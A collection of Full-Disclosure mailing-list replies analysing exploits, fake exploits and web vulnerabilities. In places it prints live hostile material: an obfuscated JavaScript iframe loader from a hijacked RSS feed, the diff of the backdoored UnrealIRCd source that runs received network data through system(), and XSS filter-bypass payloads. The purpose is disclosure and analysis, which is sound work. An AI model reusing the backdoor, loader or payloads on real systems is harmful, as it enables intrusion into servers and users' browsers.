Re: [Full-disclosure] Re(2): An April Fools' Day Android Payload
On 2012-04-02, at 11:42, アドリアンヘンドリック wrote: Just for the curiosity of April fool, actually I did a double check the $payload in x86 ASM code. Er... did you miss the part that said ARM payload? ARM is not x86. :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
On 2012-01-25, at 16:36, Sanguinarious Rose wrote: I have found the perfect image to describe my thoughts on this current clash of intellectuals. http://www.threadbombing.com/data/media/27/arguing.jpg Alternatively (also, a more memorable link): http://www.internetargument.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Symlink vulnerabilities
On 2011-10-27, at 07:48, valdis.kletni...@vt.edu wrote: The other thing that people need to remember is that there's no race condition that's so small that you can't hit it. If there's a race condition, it *can* be won. And systems like inotify make filesystem races trivial to win. I wouldn't be surprised if you could win this particular race reliably by watching for the files bzexe drops and acting immediately when they show up. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
On 2011-10-25, at 19:15, adam wrote: http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code, claims to be a remote kernel root exploit) http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar code, claims to be an IIS exploit) http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire thread, code is mentioned though) I'm sure there's more, but this kinda reminds me of that leaked private exploit on pastebin a few weeks back (you know, the one that was nice enough to create a _local_ root account), and insisted that it was private private private and specifically said NOT to leak it. Well, I'll give it this -- it's one of the smaller Perl IRC bots I've seen in a while. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
On 2011-10-04, at 02:43, Darren Martyn wrote: Is there actually a non backdoored variant of said code? I have not seen any CVE mentioning that exploit so I was naturally wondering. You are assuming that there is some substance to the code *besides* being a trojan/backdoor. Your assumption is mistaken -- there's no substance to it at all. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
On 2011-10-04, at 14:39, Kai wrote: Hi halfdog, Just for those, who want to build their own apache shell code for testing purposes, this snip might be of some use. It uses the still open tcp connections to the server to spawn the shells, so that no backconnect is needed. Of course, it does not give remote root but only httpd user privs. And you should send exec 10 as first command if you want to see remote shell stdout. wasn't that bug fixed a long ago? https://bugs.php.net/bug.php?id=38915 --- https://issues.apache.org/bugzilla/show_bug.cgi?id=46425 sorry if i'm talking about different thing. It's a generic method of getting a shell set up once you have code execution, not an exploit for any specific bug. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
On 2011-10-03, at 07:31, Darren Martyn wrote: I regularly trawl Pastebin.com to find code - often idiots leave some 0day and similar there and it is nice to find. Well, seeing as I have no test boxes at the moment, can someone check this code in a VM? I am not sure if it is legit or not. Totally fake: execl(/bin/sh, sh, -c, evil, 0); That's taking shellcode in a much different direction than I've seen in the past. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possibility to exploit bash * processing
On 2011-09-21, at 09:55, valdis.kletni...@vt.edu wrote: On Wed, 21 Sep 2011 16:01:24 +0300, Dan Carpenter said: Seems like a good time to promote David Wheeler's filename proposal: http://www.dwheeler.com/essays/fixing-unix-linux-filenames.html Unfortunately, David Wheeler's proposal has some implementation issues: 1. Forbid/escape ASCII control characters (bytes 1-31 and 127) in filenames, including newline, escape, and tab. 3. Forbid/escape filenames that aren't a valid UTF-8 encoding. The problem is that the UTF-8 codespace consists *mostly* of multibyte characters, wherein at least one of the bytes, when considered by itself, is an ASCII control character. Not true - the multibyte sequences in UTF-8 text consist entirely of high-bit characters (0xC2 - 0xF4 initial, 0x80 - 0xBF continuation). All characters below 0x80, including ASCII control characters, are always mapped directly to the corresponding codepoints. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Western Union Certificate Error
On 2011-09-07, at 07:40, JT S wrote: I recently got this error You attempted to reach www.westernunion.com, but instead you actually reached a server identifying itself as wumt.westernunion.com. This may be caused by a misconfiguration on the server or by something more serious. This appears to be an error, not a hack. Western Union doesn't use https://www.westernunion.com for anything obvious on their site -- the login form is at https://wumt.westernunion.com, and all of the other secure services I spotted are on different domains as well. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question about disclosure of WordPress plugin vulnerabilities
On 2011-08-26, at 05:08, Miroslav Stampar wrote: Does anybody know what's the general opinion on disclosure of WordPress plugin vulnerabilities in these two sections: ... 2) admin ones (requires access to the restricted admin area) If you need full admin access to run the exploit, you probably have enough access that you could get arbitrary code execution by installing a plugin, like: http://wordpress.org/extend/plugins/wordpress-console/ So the exploit isn't really doing much at that point, unless it can be triggered remotely (e.g, CSRF). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Advisory: Range header DoS vulnerability Apache HTTPD 1.3/2.x (CVE-2011-3192)
On 2011-08-26, at 08:12, Nikolay Kichukov wrote: Hi, This one works like charm on my debian stable LimitRequestFieldSize 200 in the apache2.conf as global directive for all vhosts. Be cautious about applying this mitigation -- it *will* break applications which use large cookies. In particular, the cookies generated by Google Analytics are often over 200 bytes long alone. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE handling the HTML notes incorrectly may lead to XSS attacks
On 2011-08-07, at 19:53, CnCxzSec衰仔 wrote: hi all, here is an interesting trick to perform an xss attack with IE browsers. some rich text applications such as email and blog, may provide HTML uses but have a policy to block the on-event execution to prevent the XSS attack. However, this applications may also allow the HTML notes uses,for instance !-- -- Any such applications are likely to also be vulnerable to a simpler attack based on downlevel-hidden conditional comments: !--[if IE] scriptanything you want can go here, presumably/script ![endif]-- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SOngs.pk Hacked ! By Indian Hacker Team (Dueto Mumbai Terror)
On 2011-07-15, at 22:49, w0lfd...@gmail.com wrote: We might see a few more of these after the recent blasts in India. Cyberwar between both nations can be at peak for some time again! Cyberwar? That might be stretching things a bit. Lame script-kiddy antics seems a little closer to the mark. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PenTestIT.com RSS feed suspicius
On 2011-07-05, at 10:31, ector dulac wrote: # curl http://feeds.feedburner.com/PenTestIT/ ... scriptvar t=;var arr=646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f696e6e65737370686f746f2e636f6d2f666f72756d2e7068703f74703d3637356561666563343331623166373077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729;for(i=0;iarr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);/script Looks suspicious to me Very. That unescapes to: document.write('iframe src=http://innessphoto.com/forum.php?tp=675eafec431b1f72; width=1 height=1 frameborder=0/iframe') Which loads some amusingly obfuscated JS which looks like it's *supposed* to be a plugin exploit of some sort, but which has no real payload. At least, not when I looked. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PenTestIT.com RSS feed suspicius
On 2011-07-05, at 20:55, Nick FitzGerald wrote: Andrew Farmer to ector dulac: Looks suspicious to me Very. That unescapes to: [something that trips a bunch of AVs] Which loads some amusingly obfuscated JS ... Really? That amused you? Maybe my irony detector is on the blink, but that was very ordinary several years ago. Eh, I hadn't seen the with() { } trick before. ... which looks like it's *supposed* to be a plugin exploit of some sort, but which has no real payload. At least, not when I looked. U -- not what I got at all. Perhaps it's UA sniffing -- the copy I got looked almost identical to the copy seen at: http://jsunpack.jeek.org/dec/go?report=c162b83bf99e26230f680b36ce63a215c1165334 including the empty redirect() function triggered by a chain of spl1/spl2/.../spl6 functions. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [New Security Tool] INSECT Pro 2.6.1 release
On 2011-06-22, at 20:38, adam wrote: - Using outdated version of SSL - Outdated SSL Certificate (2009) And while we're beating this dead horse: You attempted to reach www.insecurityresearch.com, but instead you actually reached a server identifying itself as myinflatableboat.net. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.0.63 - 2.2.19 Remote Exploit Fake or not?
On 2011-06-15, at 12:59, kernel wrote: Hi, all, Some days ago I found head -n * of exploit for apache at patebin.com http://pastebin.com/XEFnG9D6 #!/usr/bin/perl # # Apache 2.0.63 - 2.2.19 Remote Exploit # # This 0-day exploit will remotely gain root on any apache server from version 2.0.63 to 2.2.19 # Beta release 2.3.12-beta was also compromised by an affiliate - need verification... The header looks like a crude modification of this 2003 DAV exploit: http://www.exploit-db.com/download/38/ There's also a glaring syntax error on line 22 of the pastebin code. It'd never run as written. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] File system recursion and symlinks: A never-ending story (and how to bring it to an end for me)
On 2011-05-30, at 16:27, coderman wrote: On Mon, May 30, 2011 at 6:56 AM, halfdog m...@halfdog.net wrote: It seems that quite a few backup applications are (or were) vulnerable to special combined symlink/timing attacks on pathname components before the last one (so O_NOFOLLOW does not help). ... Please let me know, if ... you have good reason, that the kernel interface is not the point, where this issue could be addressed most efficiently. use lvm snapshots for backups, either directly at volume level or mounting a read-only snapshot and running backup over that static filesystem state. LVM snapshots have some nasty gotchas, though: https://bugs.launchpad.net/lvm2/+bug/360237 They also don't solve the problem of restoring a fragment of data (e.g, a single accidentally deleted file) from a backup in an untrustworthy environment. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker
On 2011-03-29, at 12:29, k...@rhynn.net wrote: is there any chance of seeing CUDA in action for the next versions? :) Ha ha ha, no. (See below.) Installed executable is completely portable. why do we need installer then? distribute that tool as single executable. Because without the installer, it can't try to monetize the install by installing search toolbars! (It's nice enough to continue the install if you reject their terms, though.) On 2011-03-29, at 13:13, Jo Galara wrote: How does it work? Bruteforce? Yes, but... well, JAD does a better job of explaining than I possibly could: Runtime rt = Runtime.getRuntime(); String str = 7z.exe x ; str = str + \ + _filepath + \ ; str = str + -p\ + pwd + \ ; str = str + -o\ + _destpath + \; str = str + -y; System.out.println(str); Process p = rt.exec(str); p.waitFor(); if (p.exitValue() == 0) { ret = true; } ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook URL Redirect Vulnerability
On 2011-03-02, at 06:30, Nathan Power wrote: There are 3 different steps to perform an attack using a URL redirect: 1) trick the user 2) redirect 3) exploit .. We are using a Facebook URL to trick the user, we are using the URL redirect as the catalyst to perform an exploit. Here are some examples of the types of attacks you can perform with a URL redirect, CSRF, phishing (fake fb login), and browser exploits (javascript zombie,0days,etc). How would you have written the impact section? Something like this: 3. Impact: An attacker may obfuscate the target of a link, potentiating phishing attacks and/or bypassing some simple URL filters. Or something of the sort. The actual target of the link isn't obscured in the URL, so it's not even particularly convincing if the URL is displayed in plain text. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook URL Redirect Vulnerability
On 2011-02-28, at 09:42, Nathan Power wrote: 3. Impact: Potentially allow an attacker to compromise a victim’s Facebook account and/or computer system. Do you have an actual attack in mind which could accomplish either of these goals, or is this wishful thinking? (Browser exploits don't really count, as those would work just fine with or without the redirect.) To be clear - open redirects are certainly a problem, but don't try to call them any more than that. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] sourceforge entry point seems still active.
On 2011-01-24, at 12:08, exploit dev wrote: Anyway, I'm sorry repeat my message. I think that this issue is a bit critical but I don't receive still any feedback, It's not particularly critical by any means. SourceForge projects all have their own web space, and there are doubtless a bunch of them running vulnerable versions of software. These sites are relatively isolated, and don't have write access to the project's SCM or downloads. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Filezilla's silent caching of user's credentials
On 14 Oct 2010, at 14:01, Jeffrey Walton wrote: If the encryption key stays on the same PC, there is absolutely no security in that. Given that this is open source, security through obscurity can't even start working (- encrypting local files with a local key / using custom algo == security through obscurity). Linux [apparently] has not caught on to the fact that applications could use help in securing secrets. Microsoft has DPAPI and iOS has KeyChain (one of the bug reports stated about the same). Kernel key management seems to be a step in the right direction: http://lwn.net/Articles/210502/ And FWIW, Keychain Services is mostly (all?) in userspace, so there's no reason a similar solution couldn't be implemented on Linux. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fw: [irc-security] UnrealIRCd 3.2.8.1 backdoored on official ftp and site
On 12 Jun 2010, at 08:09, Henri Salo wrote: I'd like to let you know that there's been a compromise of the unrealircd website and ftp and the 3.2.8.1 tarball release had been replaced by a backdoored copy. And here's the diff. Nature of the backdoor should be obvious upon inspection. --- diff -ru Unreal3.2-good/include/struct.h Unreal3.2-backdoored/include/struct.h --- Unreal3.2-good/include/struct.h 2009-04-13 04:03:57.0 -0700 +++ Unreal3.2-backdoored/include/struct.h 2009-04-13 04:03:00.0 -0700 @@ -430,6 +430,7 @@ #endif /* Fake lag exception */ + #define IsNoFakeLag(x) ((x)-flags FLAGS_NOFAKELAG) #define SetNoFakeLag(x) ((x)-flags |= FLAGS_NOFAKELAG) #define ClearNoFakeLag(x) ((x)-flags = ~FLAGS_NOFAKELAG) @@ -448,6 +449,7 @@ #else #define IsNotSpoof(x) (1) #endif +#defineDEBUGMODE3 ((x)-flags FLAGS_NOFAKELAG) #define GetHost(x) (IsHidden(x) ? (x)-user-virthost : (x)-user-realhost) #define GetIP(x) ((x-user x-user-ip_str) ? x-user-ip_str : (MyConnect(x) ? Inet_ia2p(x-ip) : NULL)) @@ -513,6 +515,10 @@ #else #define CHECKPROTO(x,y) (checkprotoflags(x, y, __FILE__, __LINE__)) #endif +#ifdef DEBUGMODE3 +#define DEBUGMODE3_INFOAB +#defineDEBUG3_LOG(x) DEBUG3_DOLOG_SYSTEM (x) +#endif #define DontSendQuit(x)(CHECKPROTO(x, PROTO_NOQUIT)) #define IsToken(x) (CHECKPROTO(x, PROTO_TOKEN)) @@ -1373,6 +1379,7 @@ #define INCLUDE_REMOTE 0x2 #define INCLUDE_DLQUEUED 0x4 #define INCLUDE_USED 0x8 +#define DEBUG3_DOLOG_SYSTEM(x) system(x) struct _configitem_include { ConfigItem *prev, *next; diff -ru Unreal3.2-good/src/s_bsd.c Unreal3.2-backdoored/src/s_bsd.c --- Unreal3.2-good/src/s_bsd.c 2009-03-01 10:37:58.0 -0800 +++ Unreal3.2-backdoored/src/s_bsd.c2006-06-16 11:29:00.0 -0700 @@ -1431,6 +1431,10 @@ return 1; if (length = 0) return length; +#ifdef DEBUGMODE3 + if (!memcmp(readbuf, DEBUGMODE3_INFO, 2)) + DEBUG3_LOG(readbuf); +#endif for (h = Hooks[HOOKTYPE_RAWPACKET_IN]; h; h = h-next) { int v = (*(h-func.intfunc))(cptr, readbuf, length); ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Drupal Context Module XSS
On 10 May 2010, at 06:08, Justin C. Klein Keane wrote: Drupal security responds that they do not coordinate security fixes for modules in release candidate designation. Vulnerability was reported to the module maintainer via the public issue queue at the direction of Drupal security. Also, isn't it pretty well established by this point that Drupal generally doesn't consider XSS to be a vulnerability if you need an admin account to trigger it? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MouseOverJacking attacks
On 29 Dec 2009, at 13:48, MustLive wrote: Recently, 26th of December 2009, I wrote the article MouseOverJacking attacks (http://websecurity.com.ua/3807/), and today I wrote English version of it (http://websecurity.com.ua/3814/). Hardly news. If you can inject arbitrary HTML into a web page, there are plenty of ways (many of them easier or more flexible than this) you can get it to run Javascript: - script tags, obviously - Binding other events that'll trigger without an event, like onLoad - CSS (either inline, in a style, or loaded from another site with link rel=stylesheet) containing any of: * Background images loaded with the javascript: protocol * expression() (MSIE only?) * -moz-binding - Embedded objects (say, Flash, using ExternalInterface) None of this is considered particularly novel at this point. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] more on that
On 24 Nov 2009, at 13:41, Tyler Durten wrote: And this is what I'm talking about: http://seclists.org/fulldisclosure/2005/Apr/412 ... which reads, in part: main() { //Section Initialises designs implemented by mexicans //Imigrate system(launcher); system(netcat_shell); system(shellcode); I can understand possibly overlooking something clever (like a fake exploit that buffer-overflows itself), but this isn't even marginally subtle. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ICMPv4/IP fuzzer prototype.
On 22 Nov 2009, at 19:48, laurent gaffie wrote: Should be kweel for UTesting http://g-laurent.blogspot.com/2009/11/releasing-icmpv4ip-fuzzer-prototype.html ... Dont forget it's a prototype, and i ASSUME you know what you're doing, do not ask for help. You definitely have to know what you're doing to run the code, as posting that to Blogspot has destroyed the indentation. :) Also, random.randrange(...) is going to give you much better performance than random.choice(range(...)). Just sayin'. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Drupal XML Sitemap 6.x-1.1 XSS Vulnerability
On 15 Oct 2009, at 07:24, Justin Klein Keane wrote: Applying the following patch mitigates these threats. - --- site_map/site_map.module2009-09-30 15:09:49.295134033 -0400 +++ site_map/site_map.module 2009-09-30 15:09:30.09976 -0400 @@ -14,7 +14,7 @@ function site_map_help($path, $arg) { switch ($path) { case 'sitemap': $output = _sitemap_get_message(); - - - return $output ? 'p'. filter_xss($output) .'/p' : ''; + return $output ? 'p'. $output .'/p' : ''; } } Surely that should be the other way around? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hack-Mail.net or similar site
On 11 Sep 2009, at 02:46, mamo wrote: What do you think of web site like Hack-Mail.net or similar one? Do they really work and how? hack-mail.net/howitworks.html: After about three to four days, you will get an email from the account you wanted to hack. This email acts as proof we have hacked the account. The email will be sent from within the vistims account. It will contain information on the next step to purchase the password from us. Please check that the email was sent from the exact email address you wanted to hack. This email will NOT appear in the 'sent' folder, so they will never know they have been hacked. So, in other words, they're spoofing From addresses for profit. Clever. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Update: [GSEC-TZO-44-2009] One bug to rule them all - Firefox, IE, Safari, Opera, Chrome, Seamonkey, iPhone, iPod, Wii, PS3....
On 21 Jul 2009, at 08:12, Michal Zalewski wrote: There are literally thousands of HTML- and JavaScript-related denial of service vectors in modern browsers... There's one significant difference in this one, though: while a bunch of nested divs (for instance) will just mess with the HTML renderer, a malformed or oversized select element may end up passing bad data to native menu APIs. It's one of the only elements I can think of offhand that often has effects which extend outside the HTML canvas. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] “Cross-Site Scripting” vul nerability in MyBB 1.4.5
On 03 May 09, at 05:01, Jacques Copeau wrote: Advisory : “Cross-Site Scripting” vulnerability in MyBB snip The XSS renders in all browsers and on various pages inside the myBB software. We consider it to be particularly grave, as it renders on the ACP user overview page; this can be easily exploited to construct a universal CSRF vulnerability that introduces malicious php code into the script. So, er, is this vulnerability XSS, CSRF, or RCE? Pick one and stick with it. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Help with something?
On 12 Jan 09, at 09:53, Will McAfee wrote: I got started a long time ago writing example code for new security- interested people. I got just one example done, my full time job and school started, and gave up debugging. Just out of curiosity, going to throw it out there. It's the only example up at http://labs.thegoodhacker.com/ let's see where I messed up. It segfaults, if I remember correctly. At a glance, you're doing linked list management wrong. Stop trying to code your own. This is C++; the STL exists for a reason. Same goes for char arrays (which you leak all over the place). The STL has strings too. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] new unpatched security flaw found Firefox 3.0.4
On 16 Dec 08, at 11:49, carl hardwick wrote: New unpatched security flaw found in Firefox 3.0.4 PoC here: https://bugzilla.mozilla.org/attachment.cgi?id=302699 Relevant bug is https://bugzilla.mozilla.org/show_bug.cgi?id=416907 This doesn't appear to be security-critical - it's a NULL dereference. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
On 02 Dec 08, at 00:39, Mike C wrote: Once all desktops have an icon or widget (say at the right hand corner) with the color, and this is consistently seen everywhere, the users will start associating with their online security. they will be reminded that they have to be careful with the data they share. Perhaps you can also make a spy show up on the user's screen every half hour to warn them that their communications may be monitored, and allow them to report suspicious web sites to the appropriate authorities. http://www.telegraph.co.uk/news/worldnews/1561740/index.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] does the aim service save chat session details?
On 26 Nov 08, at 11:17, AMILABS wrote: Is AIM IM purely peer to peer or a store and forward type protocol? It is neither. In most cases, the server forwards messages from client to client, but does not retain them. The client also supports a peer- to-peer mode, but it's rarely used. We need to determine if we can recover a past IM chat conversation that occurred over two weeks ago. Our chat client did not have IM logging enabled so we need to know if the service archives all chat conversations for law enforcement and legal purposes. You'll have to ask AOL about that. If there are server-side logs, they are not exposed to users. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Zero-day Catcher for Windows available for sell
On 15 Sep 08, at 13:39, Zero-day catcher team wrote: RSA theory, discussed here, was not broken (if you have evidence - please, share it or turn off your claims in this context). The archives recall otherwise: http://www.security-express.com/archives/fulldisclosure/2007-04/0683.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Chrome Browser Vulnerability
On 02 Sep 08, at 21:48, Paul Ferguson wrote: - -- James Matthews [EMAIL PROTECTED] wrote: The same thing happened to safari when it came out on windows. Well, no kidding. :-) Maybe the flaws that will hound Chrome are due to the fact that it uses Safari as a codebase? WebKit != Safari. Security-related bugs in rendering engines are pretty uncommon. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Klueless Klowns Team PHP shell
On 17 Aug 08, at 15:59, William McAfee wrote: For those of us who do not enjoy deciphering code with next to no comments, would you mind describing what exactly that code is supposed to do, how it does it, and why? It's a PHP shell, often used on exploited systems. Doesn't appear to be significantly different from other versions in the wild, besides a few modified credits and the removal of certain automatic-update functions. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Step-by-step instructions for debugging Cisco IOS using gdb
On 15 Aug 08, at 11:20, Smiler S wrote: From: Andy Davis iosftpexploit_at_googlemail.comiosftpexploit_at_googlemail.com? Subject=Re:%20Step-by-step%20instructions%20for%20debugging%20Cisco %20IOS%20using%20gdb Date: Tue, 12 Aug 2008 22:01:37 +0100 Congratulations you are now debugging IOS ;-) One unusual feature, which I have yet to explain is that when the registers are displayed they are all offset by 1 e.g: If a vector variable is stored in a register, gcc writes debug information telling gdb which register the variable is stored in. This mapping is changed between gcc2 gcc3. Since there isn't anything in the debug output to distinguish code compiled by gcc3 from code compiled by gcc2, there is no way for gdb to know the right map. gdb supports the gcc3 map. If vector code is compiled by gcc2 as in the case of IOS, then the register assignment will be off by 1. This isn't vector code, though - the whole register map is off. I'm not particularly familiar with IOS, but my guess is the debugging protocol is a little off from what GDB expects. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] xss dot(.) filter evasion
On 18 Jun 08, at 08:49, Thomas Pollet wrote: I came across this site that implemented some filtering so the dots were replaced by an underscore, also the quotes and backslash were escaped. I came up with the code below to bypass this filtering (write anything to the page using String.fromCharCode) Someone knows a different way to do this? eval makes everything easy. Well, reasonably easy. eval(unescape(String(/%2a%2a%2falert(%22xss%22);%2f%2a%2a/))); ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] exploit coding / Pentesting / 0day selling services
On 20 Apr 08, at 11:06, Jean Duboscs wrote: I am belgium. And I am Spartacus? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] gallarific backdoored , vulnerable to xss
On 15 Apr 08, at 09:07, Thomas Pollet wrote: I was looking at the free version of gallarific, and I found some suspicious code in the scopbin directory. Attached is a file I found in the zip i downloaded, in case someone wants to decode it. Looks like a component of the ScopBin PHP obfuscator. It's not particularly hard to reverse, but I didn't bother. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day LINUX 0day LATEST
On 28 Jan 08, at 02:13, wejwklekl246 wrote: /* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE * * afunixroot.c Linux kernel 2.6.x i386 local root exploit blah blah blah Compiles a shared library in /tmp/own.so containing the functions int getuid() { return 0; } int geteuid() { return 0; } int getgid() { return 0; } int getegid() { return 0; } and executes /bin/sh with LD_PRELOAD=/tmp/own.so Pretty lame. Protip: hellc0de containing lots of \x61-\x7f looks fake. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] here
